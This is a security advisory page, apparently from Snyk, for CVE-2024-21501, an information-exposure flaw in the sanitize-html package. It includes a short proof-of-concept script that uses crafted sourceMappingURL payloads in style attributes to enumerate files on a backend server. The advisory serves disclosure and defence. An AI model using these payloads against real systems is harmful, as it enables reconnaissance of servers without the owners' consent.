Information Exposure Affecting org.webjars.npm:sanitize-html package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (15th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARSNPM-6276557
- published 28 Feb 2024
- disclosed 20 Feb 2024
- credit Vsevolod Kokorin (Slonser) of Solidlab
Introduced: 20 Feb 2024
CVE-2024-21501 Open this link in a new tabHow to fix?
There is no fixed version for org.webjars.npm:sanitize-html
.
Overview
Affected versions of this package are vulnerable to Information Exposure when used on the backend and with the style
attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.
PoC
// index.js
const sanitizeHtml = require('sanitize-html');
const file_exist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");'>@slonser_</a>`;
const file_notexist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */");'>@slonser_</a>`;
const file_exist_clean = sanitizeHtml(file_exist, {
allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
})
const file_notexist_clean = sanitizeHtml(file_notexist, {
allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
})
console.log(file_exist_clean, "// valid file path on backend")
console.log(file_notexist_clean, "// invalid file path on backend")
References
CVSS Scores
version 3.1